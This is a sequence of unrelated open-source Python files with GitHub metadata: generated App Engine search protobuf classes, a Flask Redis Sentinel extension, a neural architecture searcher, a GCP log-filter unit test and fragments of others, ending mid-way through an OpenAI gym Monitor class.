for i in xrange(x.expression_size()): self.add_expression().CopyFrom(x.expression(i))
for i in xrange(x.score_size()): self.add_score(x.score(i))
if (x.has_cursor()): self.set_cursor(x.cursor())
def Equals(self, x):
if x is self: return 1
if self.has_document_ != x.has_document_: return 0
if self.has_document_ and self.document_ != x.document_: return 0
if len(self.expression_) != len(x.expression_): return 0
for e1, e2 in zip(self.expression_, x.expression_):
if e1 != e2: return 0
if len(self.score_) != len(x.score_): return 0
for e1, e2 in zip(self.score_, x.score_):
if e1 != e2: return 0
if self.has_cursor_ != x.has_cursor_: return 0
if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_document_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: document not set.')
elif not self.document_.IsInitialized(debug_strs): initialized = 0
for p in self.expression_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.document_.ByteSize())
n += 1 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.lengthString(self.expression_[i].ByteSize())
n += 9 * len(self.score_)
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_document_):
n += 1
n += self.lengthString(self.document_.ByteSizePartial())
n += 1 * len(self.expression_)
for i in xrange(len(self.expression_)): n += self.lengthString(self.expression_[i].ByteSizePartial())
n += 9 * len(self.score_)
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
return n
def Clear(self):
self.clear_document()
self.clear_expression()
self.clear_score()
self.clear_cursor()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.document_.ByteSize())
self.document_.OutputUnchecked(out)
for i in xrange(len(self.score_)):
out.putVarInt32(17)
out.putDouble(self.score_[i])
if (self.has_cursor_):
out.putVarInt32(26)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.expression_)):
out.putVarInt32(34)
out.putVarInt32(self.expression_[i].ByteSize())
self.expression_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_document_):
out.putVarInt32(10)
out.putVarInt32(self.document_.ByteSizePartial())
self.document_.OutputPartial(out)
for i in xrange(len(self.score_)):
out.putVarInt32(17)
out.putDouble(self.score_[i])
if (self.has_cursor_):
out.putVarInt32(26)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.expression_)):
out.putVarInt32(34)
out.putVarInt32(self.expression_[i].ByteSizePartial())
self.expression_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_document().TryMerge(tmp)
continue
if tt == 17:
self.add_score(d.getDouble())
continue
if tt == 26:
self.set_cursor(d.getPrefixedString())
continue
if tt == 34:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_expression().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_document_:
res+=prefix+"document <\n"
res+=self.document_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.expression_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("expression%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.score_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("score%s: %s\n" % (elm, self.DebugFormat(e)))
cnt+=1
if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatString(self.cursor_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdocument = 1
kexpression = 4
kscore = 2
kcursor = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "document",
2: "score",
3: "cursor",
4: "expression",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.DOUBLE,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchResult'
class SearchResponse(_ExtendableProtocolMessage):
has_matched_count_ = 0
matched_count_ = 0
has_status_ = 0
has_cursor_ = 0
cursor_ = ""
def __init__(self, contents=None):
if _extension_runtime:
self._extension_fields = {}
self.result_ = []
self.status_ = RequestStatus()
self.facet_result_ = []
if contents is not None: self.MergeFromString(contents)
def result_size(self): return len(self.result_)
def result_list(self): return self.result_
def result(self, i):
return self.result_[i]
def mutable_result(self, i):
return self.result_[i]
def add_result(self):
x = SearchResult()
self.result_.append(x)
return x
def clear_result(self):
self.result_ = []
def matched_count(self): return self.matched_count_
def set_matched_count(self, x):
self.has_matched_count_ = 1
self.matched_count_ = x
def clear_matched_count(self):
if self.has_matched_count_:
self.has_matched_count_ = 0
self.matched_count_ = 0
def has_matched_count(self): return self.has_matched_count_
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def cursor(self): return self.cursor_
def set_cursor(self, x):
self.has_cursor_ = 1
self.cursor_ = x
def clear_cursor(self):
if self.has_cursor_:
self.has_cursor_ = 0
self.cursor_ = ""
def has_cursor(self): return self.has_cursor_
def facet_result_size(self): return len(self.facet_result_)
def facet_result_list(self): return self.facet_result_
def facet_result(self, i):
return self.facet_result_[i]
def mutable_facet_result(self, i):
return self.facet_result_[i]
def add_facet_result(self):
x = FacetResult()
self.facet_result_.append(x)
return x
def clear_facet_result(self):
self.facet_result_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.result_size()): self.add_result().CopyFrom(x.result(i))
if (x.has_matched_count()): self.set_matched_count(x.matched_count())
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
if (x.has_cursor()): self.set_cursor(x.cursor())
for i in xrange(x.facet_result_size()): self.add_facet_result().CopyFrom(x.facet_result(i))
if _extension_runtime: self._MergeExtensionFields(x)
def Equals(self, x):
if x is self: return 1
if len(self.result_) != len(x.result_): return 0
for e1, e2 in zip(self.result_, x.result_):
if e1 != e2: return 0
if self.has_matched_count_ != x.has_matched_count_: return 0
if self.has_matched_count_ and self.matched_count_ != x.matched_count_: return 0
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if self.has_cursor_ != x.has_cursor_: return 0
if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
if len(self.facet_result_) != len(x.facet_result_): return 0
for e1, e2 in zip(self.facet_result_, x.facet_result_):
if e1 != e2: return 0
if _extension_runtime and not self._ExtensionEquals(x): return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.result_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_matched_count_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: matched_count not set.')
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
for p in self.facet_result_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.result_)
for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSize())
n += self.lengthVarInt64(self.matched_count_)
n += self.lengthString(self.status_.ByteSize())
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
n += 1 * len(self.facet_result_)
for i in xrange(len(self.facet_result_)): n += self.lengthString(self.facet_result_[i].ByteSize())
if _extension_runtime:
n += self._ExtensionByteSize(False)
return n + 2
def ByteSizePartial(self):
n = 0
n += 1 * len(self.result_)
for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSizePartial())
if (self.has_matched_count_):
n += 1
n += self.lengthVarInt64(self.matched_count_)
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
n += 1 * len(self.facet_result_)
for i in xrange(len(self.facet_result_)): n += self.lengthString(self.facet_result_[i].ByteSizePartial())
if _extension_runtime:
n += self._ExtensionByteSize(True)
return n
def Clear(self):
self.clear_result()
self.clear_matched_count()
self.clear_status()
self.clear_cursor()
self.clear_facet_result()
if _extension_runtime: self._extension_fields.clear()
def OutputUnchecked(self, out):
if _extension_runtime:
extensions = self._ListExtensions()
extension_index = 0
for i in xrange(len(self.result_)):
out.putVarInt32(10)
out.putVarInt32(self.result_[i].ByteSize())
self.result_[i].OutputUnchecked(out)
out.putVarInt32(16)
out.putVarInt64(self.matched_count_)
out.putVarInt32(26)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.facet_result_)):
out.putVarInt32(42)
out.putVarInt32(self.facet_result_[i].ByteSize())
self.facet_result_[i].OutputUnchecked(out)
if _extension_runtime:
extension_index = self._OutputExtensionFields(out, False, extensions, extension_index, 10000)
def OutputPartial(self, out):
if _extension_runtime:
extensions = self._ListExtensions()
extension_index = 0
for i in xrange(len(self.result_)):
out.putVarInt32(10)
out.putVarInt32(self.result_[i].ByteSizePartial())
self.result_[i].OutputPartial(out)
if (self.has_matched_count_):
out.putVarInt32(16)
out.putVarInt64(self.matched_count_)
if (self.has_status_):
out.putVarInt32(26)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
for i in xrange(len(self.facet_result_)):
out.putVarInt32(42)
out.putVarInt32(self.facet_result_[i].ByteSizePartial())
self.facet_result_[i].OutputPartial(out)
if _extension_runtime:
extension_index = self._OutputExtensionFields(out, True, extensions, extension_index, 10000)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_result().TryMerge(tmp)
continue
if tt == 16:
self.set_matched_count(d.getVarInt64())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if tt == 34:
self.set_cursor(d.getPrefixedString())
continue
if tt == 42:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_facet_result().TryMerge(tmp)
continue
if _extension_runtime:
if (1000 <= tt and tt < 10000):
self._ParseOneExtensionField(tt, d)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.result_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("result%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_matched_count_: res+=prefix+("matched_count: %s\n" % self.DebugFormatInt64(self.matched_count_))
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatString(self.cursor_))
cnt=0
for e in self.facet_result_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("facet_result%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if _extension_runtime:
res+=self._ExtensionDebugString(prefix, printElemNumber)
return res
if _extension_runtime:
_extensions_by_field_number = {}
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kresult = 1
kmatched_count = 2
kstatus = 3
kcursor = 4
kfacet_result = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "result",
2: "matched_count",
3: "status",
4: "cursor",
5: "facet_result",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.STRING,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchResponse'
if _extension_runtime:
pass
__all__ = ['SearchServiceError','RequestStatus','IndexSpec','IndexMetadata_Storage','IndexMetadata','IndexDocumentParams','IndexDocumentRequest','IndexDocumentResponse','DeleteDocumentParams','DeleteDocumentRequest','DeleteDocumentResponse','ListDocumentsParams','ListDocumentsRequest','ListDocumentsResponse','DeleteIndexParams','DeleteIndexRequest','DeleteIndexResponse','CancelDeleteIndexParams','CancelDeleteIndexRequest','CancelDeleteIndexResponse','ListIndexesParams','ListIndexesRequest','ListIndexesResponse','DeleteSchemaParams','DeleteSchemaRequest','DeleteSchemaResponse','SortSpec','ScorerSpec','FieldSpec','FieldSpec_Expression','FacetRange','FacetRequestParam','FacetAutoDetectParam','FacetRequest','FacetRefinement_Range','FacetRefinement','SearchParams','SearchRequest','FacetResultValue','FacetResult','SearchResult','SearchResponse']
|
{
"content_hash": "08f276f64f5d4f9e868f6c7d924ee582",
"timestamp": "",
"source": "github",
"line_count": 7525,
"max_line_length": 851,
"avg_line_length": 29.643322259136212,
"alnum_prop": 0.6357669927286095,
"repo_name": "ProfessionalIT/maxigenios-website",
"id": "a3750576a17fce01de62f7c7b67ba60bfc06ed95",
"size": "223670",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sdk/google_appengine/google/appengine/api/search/search_service_pb.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "423"
},
{
"name": "Batchfile",
"bytes": "5005"
},
{
"name": "C",
"bytes": "407880"
},
{
"name": "CSS",
"bytes": "334712"
},
{
"name": "Emacs Lisp",
"bytes": "4733"
},
{
"name": "HTML",
"bytes": "623959"
},
{
"name": "JavaScript",
"bytes": "880776"
},
{
"name": "Makefile",
"bytes": "14029"
},
{
"name": "PHP",
"bytes": "2886167"
},
{
"name": "Python",
"bytes": "40653515"
},
{
"name": "Shell",
"bytes": "3855"
},
{
"name": "TeX",
"bytes": "3149"
},
{
"name": "VimL",
"bytes": "5645"
}
],
"symlink_target": ""
}
|
"""Remove an app_name(s) from installed apps."""
from magpy.management import BaseCommand, CommandError
from magpy.server.database import Database
class Command(BaseCommand):
"""Remove an app_name(s) from installed apps."""
help = ('Remove an app_name(s) from installed apps.')
args = '[app_name ...]'
def handle(self, *args, **kwargs):
database = Database()
for arg in args:
database.remove_app(arg)
|
{
"content_hash": "e3b83d1490011b5e53172649860a844f",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 57,
"avg_line_length": 32,
"alnum_prop": 0.6540178571428571,
"repo_name": "zeth/magpy",
"id": "ab95053c8a324db838e6ea509a933b7917b1fcde",
"size": "448",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "magpy/management/commands/remove_app.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "173315"
},
{
"name": "Python",
"bytes": "295428"
}
],
"symlink_target": ""
}
|
import os
import urllib
import json
import sys
import ast
import argparse
import utils
def settings(default_parser):
parser = default_parser
args = default_parser.parse_args()
boost_version = args.track if args.track != "master" else "1.57.0"
passwords = ast.literal_eval(args.passwords.replace('->', ':'))
variables = {"BIICODE_BOOST_VERSION":
lambda block, block_track, file: boost_version,
"WORKING_TRACK":
lambda block, block_track, file: args.track,
"BIICODE_BOOST_BLOCK":
lambda block, block_track, file: "biicode/boost({0})"
.format(block_track),
"LATEST_BLOCK_VERSION":
lambda block, block_track, file: utils.latest_block_version(block, block_track)}
templates={"biicode/boost":
{"publish": not args.no_publish,
"tag": args.tag,
"files":
{"biicode.conf": ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION"],
"setup.cmake": ["BIICODE_BOOST_VERSION"]}
}
}
# "examples/boost-log" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-coroutine" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-filesystem" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-flyweight" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-multiindex" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-phoenix" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])]),
# "examples/boost-signals" : (examples_version_tag, [("biicode.conf", ["BIICODE_BOOST_BLOCK", "LATEST_BLOCK_VERSION", "WORKING_TRACK"])])}
#Boost.Log takes so much time to compile, leads to timeouts on Travis CI
#It was tested on Windows and linux, works 'ok' (Be careful with linking settings)
if args.ci and 'examples/boost-log' in templates: del templates['examples/boost-log']
if args.exclude:
for block in args.exclude.split(' '):
if block in templates:
del templates[block]
return utils.GenerationSettings(templates, variables, passwords,
args.templates_path, args.blocks_path)
if __name__ == '__main__':
print(settings())
|
{
"content_hash": "e02e8f906a4da7839cd7260af95c334a",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 157,
"avg_line_length": 49.152542372881356,
"alnum_prop": 0.5779310344827586,
"repo_name": "bowlofstew/boost",
"id": "fe9deb935cb6f08956a1e490b8b849c8be587603",
"size": "2969",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "22473"
},
{
"name": "CMake",
"bytes": "38314"
},
{
"name": "Python",
"bytes": "2969"
},
{
"name": "Shell",
"bytes": "1666"
}
],
"symlink_target": ""
}
|
import deep_architect.searchers.common as se
import numpy as np
# NOTE: this searcher does not do any budget adjustment and needs to be
# combined with an evaluator that does.
class SuccessiveNarrowing(se.Searcher):
def __init__(self, search_space_fn, num_initial_samples, reduction_factor,
reset_default_scope_upon_sample):
se.Searcher.__init__(self, search_space_fn,
reset_default_scope_upon_sample)
self.num_initial_samples = num_initial_samples
self.reduction_factor = reduction_factor
self.vals = [None for _ in range(num_initial_samples)]
self.num_remaining = num_initial_samples
self.idx = 0
self.queue = []
for _ in range(num_initial_samples):
inputs, outputs = search_space_fn()
hyperp_value_lst = se.random_specify(outputs)
self.queue.append(hyperp_value_lst)
def sample(self):
assert self.idx < len(self.queue)
hyperp_value_lst = self.queue[self.idx]
(inputs, outputs) = self.search_space_fn()
se.specify(outputs, hyperp_value_lst)
idx = self.idx
self.idx += 1
return inputs, outputs, hyperp_value_lst, {"idx": idx}
def update(self, val, searcher_eval_token):
assert self.num_remaining > 0
idx = searcher_eval_token["idx"]
assert self.vals[idx] is None
self.vals[idx] = val
self.num_remaining -= 1
# generate the next round of architectures by keeping the best ones.
if self.num_remaining == 0:
num_samples = int(self.reduction_factor * len(self.queue))
assert num_samples > 0
top_idxs = np.argsort(self.vals)[::-1][:num_samples]
self.queue = [self.queue[idx] for idx in top_idxs]
self.vals = [None for _ in range(num_samples)]
self.num_remaining = num_samples
self.idx = 0
# run simple successive narrowing on a single machine.
def run_successive_narrowing(search_space_fn, num_initial_samples,
initial_budget, get_evaluator, extract_val_fn,
num_samples_reduction_factor,
budget_increase_factor, num_rounds,
get_evaluation_logger):
num_samples = num_initial_samples
searcher = SuccessiveNarrowing(search_space_fn, num_initial_samples,
num_samples_reduction_factor)
evaluation_id = 0
for round_idx in range(num_rounds):
budget = initial_budget * (budget_increase_factor**round_idx)
evaluator = get_evaluator(budget)
for idx in range(num_samples):
(inputs, outputs, hyperp_value_lst,
searcher_eval_token) = searcher.sample()
results = evaluator.eval(inputs, outputs)
val = extract_val_fn(results)
searcher.update(val, searcher_eval_token)
logger = get_evaluation_logger(evaluation_id)
logger.log_config(hyperp_value_lst, searcher_eval_token)
logger.log_results(results)
evaluation_id += 1
num_samples = int(num_samples_reduction_factor * num_samples)
|
{
"content_hash": "ffb420bc70a7e5c47bebed68e7cea8ea",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 42,
"alnum_prop": 0.6038961038961039,
"repo_name": "negrinho/deep_architect",
"id": "134a53471e6d7282b03c7bc82d81337f7df6746c",
"size": "3234",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deep_architect/searchers/successive_narrowing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "572577"
},
{
"name": "Shell",
"bytes": "11377"
}
],
"symlink_target": ""
}
|
import six
import inspect
import redis
import redis.sentinel
import redis_sentinel_url
from flask import current_app
from werkzeug.local import Local, LocalProxy
from werkzeug.utils import import_string
_EXTENSION_KEY = 'redissentinel'
class RedisSentinelInstance(object):
def __init__(self, url, client_class, client_options, sentinel_class, sentinel_options):
self.url = url
self.client_class = client_class
self.client_options = client_options
self.sentinel_class = sentinel_class
self.sentinel_options = sentinel_options
self.local = Local()
self._connect()
if self.local.connection[0] is None:
# if there is no sentinel, we don't need to use thread-local storage
self.connection = self.local.connection
self.local = self
def _connect(self):
try:
return self.local.connection
except AttributeError:
conn = redis_sentinel_url.connect(
self.url,
sentinel_class=self.sentinel_class, sentinel_options=self.sentinel_options,
client_class=self.client_class, client_options=self.client_options)
self.local.connection = conn
return conn
@property
def sentinel(self):
return self._connect()[0]
@property
def default_connection(self):
return self._connect()[1]
def master_for(self, service_name, **kwargs):
try:
return self.local.master_connections[service_name]
except AttributeError:
self.local.master_connections = {}
except KeyError:
pass
sentinel = self.sentinel
if sentinel is None:
msg = 'Cannot get master {} using non-sentinel configuration'
raise RuntimeError(msg.format(service_name))
conn = sentinel.master_for(service_name, redis_class=self.client_class, **kwargs)
self.local.master_connections[service_name] = conn
return conn
def slave_for(self, service_name, **kwargs):
try:
return self.local.slave_connections[service_name]
except AttributeError:
self.local.slave_connections = {}
except KeyError:
pass
sentinel = self.sentinel
if sentinel is None:
msg = 'Cannot get slave {} using non-sentinel configuration'
raise RuntimeError(msg.format(service_name))
conn = sentinel.slave_for(service_name, redis_class=self.client_class, **kwargs)
self.local.slave_connections[service_name] = conn
return conn
class RedisSentinel(object):
"""Flask extension that supports connections to master using Redis Sentinel.
Supported URL types:
redis+sentinel://
redis://
rediss://
unix://
"""
def __init__(self, app=None, config_prefix='REDIS', client_class=None, sentinel_class=None):
self.config_prefix = config_prefix
self.client_class = client_class
self.sentinel_class = sentinel_class
if app is not None:
self.init_app(app)
self.sentinel = LocalProxy(lambda: self.get_instance().sentinel)
self.default_connection = LocalProxy(lambda: self.get_instance().default_connection)
def init_app(self, app, config_prefix=None, client_class=None, sentinel_class=None):
config_prefix = config_prefix or self.config_prefix
app.config.setdefault(config_prefix + '_' + 'URL', 'redis://localhost/0')
config = self._strip_dict_prefix(app.config, config_prefix + '_')
extensions = app.extensions.setdefault(_EXTENSION_KEY, {})
if config_prefix in extensions:
msg = 'Redis sentinel extension with config prefix {} is already registered'
raise RuntimeError(msg.format(config_prefix))
client_class = self._resolve_class(
config, 'CLASS', 'client_class', client_class, redis.StrictRedis)
sentinel_class = self._resolve_class(
config, 'SENTINEL_CLASS', 'sentinel_class', sentinel_class, redis.sentinel.Sentinel)
url = config.pop('URL')
client_options = self._config_from_variables(config, client_class)
sentinel_options = self._config_from_variables(
self._strip_dict_prefix(config, 'SENTINEL_'), client_class)
extensions[config_prefix] = RedisSentinelInstance(
url, client_class, client_options, sentinel_class, sentinel_options)
self.config_prefix = config_prefix
def _resolve_class(self, config, config_key, attr, the_class, default_class):
if the_class is None:
the_class = getattr(self, attr)
if the_class is None:
the_class = config.get(config_key, default_class)
if isinstance(the_class, six.string_types):
the_class = import_string(the_class)
config.pop(config_key, None)
return the_class
@staticmethod
def _strip_dict_prefix(orig, prefix):
return {k[len(prefix):]: v for (k, v) in six.iteritems(orig) if k.startswith(prefix)}
@staticmethod
def _config_from_variables(config, the_class):
args = inspect.getargspec(the_class.__init__).args
args.remove('self')
args.remove('host')
args.remove('port')
args.remove('db')
return {arg: config[arg.upper()] for arg in args if arg.upper() in config}
def get_instance(self):
app = current_app._get_current_object()
if _EXTENSION_KEY not in app.extensions or self.config_prefix not in app.extensions[_EXTENSION_KEY]:
msg = 'Redis sentinel extension with config prefix {} was not initialized for application {}'
raise RuntimeError(msg.format(self.config_prefix, app.import_name))
return app.extensions[_EXTENSION_KEY][self.config_prefix]
def master_for(self, service_name, **kwargs):
return LocalProxy(lambda: self.get_instance().master_for(service_name, **kwargs))
def slave_for(self, service_name, **kwargs):
return LocalProxy(lambda: self.get_instance().slave_for(service_name, **kwargs))
SentinelExtension = RedisSentinel # for backwards-compatibility
|
{
"content_hash": "ddd8e5562d07f3ab4017e1fa66ec69f1",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 108,
"avg_line_length": 37.626506024096386,
"alnum_prop": 0.6402497598463016,
"repo_name": "exponea/flask-redis-sentinel",
"id": "d8d9f7eef4c87130f98bd995326b03ca6158d1d2",
"size": "6855",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "flask_redis_sentinel.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "26052"
}
],
"symlink_target": ""
}
|
"""Tests for the "update_gcp_log_flow_filter" module."""
import unittest
from unittest import mock
from google.auth.transport import requests
from . import update_gcp_log_flow_filter
SAMPLE_FILTER_ID = "00000000-0000-0000-0000-000000000000"
DEFAULT_FILTER_EXPRESSION = (
"log_id(\"dns.googleapis.com/dns_queries\") OR "
"log_id(\"cloudaudit.googleapis.com/activity\") OR "
"log_id(\"cloudaudit.googleapis.com/system_event\")")
class UpdateGCPLogFlowFilter(unittest.TestCase):
def test_initialize_command_line_args(self):
actual = update_gcp_log_flow_filter.initialize_command_line_args([
"--credentials_file=./foo.json", "--organization_id=123",
f"--filter_id={SAMPLE_FILTER_ID}",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNotNone(actual)
def test_initialize_command_line_args_organization_id_too_big(self):
invalid_organization_id = 2**64
actual = update_gcp_log_flow_filter.initialize_command_line_args([
f"--organization_id={invalid_organization_id}",
f"--filter_id={SAMPLE_FILTER_ID}",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNone(actual)
def test_initialize_command_line_args_negative_organization_id(self):
actual = update_gcp_log_flow_filter.initialize_command_line_args([
"--organization_id=-1", f"--filter_id={SAMPLE_FILTER_ID}",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNone(actual)
def test_initialize_command_line_args_invalid_filter_id(self):
actual = update_gcp_log_flow_filter.initialize_command_line_args([
"--organization_id=123", "--filter_id=123",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNone(actual)
@mock.patch.object(requests, "AuthorizedSession", autospec=True)
@mock.patch.object(requests.requests, "Response", autospec=True)
def test_http_error(self, mock_response, mock_session):
mock_session.request.return_value = mock_response
type(mock_response).status_code = mock.PropertyMock(return_value=400)
mock_response.raise_for_status.side_effect = (
requests.requests.exceptions.HTTPError())
with self.assertRaises(requests.requests.exceptions.HTTPError):
update_gcp_log_flow_filter.update_gcp_log_flow_filter(
mock_session, 123, SAMPLE_FILTER_ID, DEFAULT_FILTER_EXPRESSION)
@mock.patch.object(requests, "AuthorizedSession", autospec=True)
@mock.patch.object(requests.requests, "Response", autospec=True)
def test_happy_path(self, mock_response, mock_session):
mock_session.request.return_value = mock_response
type(mock_response).status_code = mock.PropertyMock(return_value=200)
update_gcp_log_flow_filter.update_gcp_log_flow_filter(
mock_session, 123, SAMPLE_FILTER_ID, DEFAULT_FILTER_EXPRESSION)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "0fc3b3ba5bfd615d15dfa624c5cabcc9",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 73,
"avg_line_length": 39.37837837837838,
"alnum_prop": 0.7086479066575154,
"repo_name": "chronicle/api-samples-python",
"id": "f395af459ffa0e73a8277bde59cca82c3d7fff63",
"size": "3490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "service_management/update_gcp_log_flow_filter_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "556471"
}
],
"symlink_target": ""
}
|
import gym
from gym import Wrapper
from gym import error, version
import os, json, logging, numpy as np, six
from gym.monitoring import stats_recorder, video_recorder
from gym.utils import atomic_write, closer
from gym.utils.json_utils import json_encode_np
logger = logging.getLogger(__name__)
FILE_PREFIX = 'openaigym'
MANIFEST_PREFIX = FILE_PREFIX + '.manifest'
class Monitor(Wrapper):
def __init__(self, env, directory, video_callable=None, force=False, resume=False,
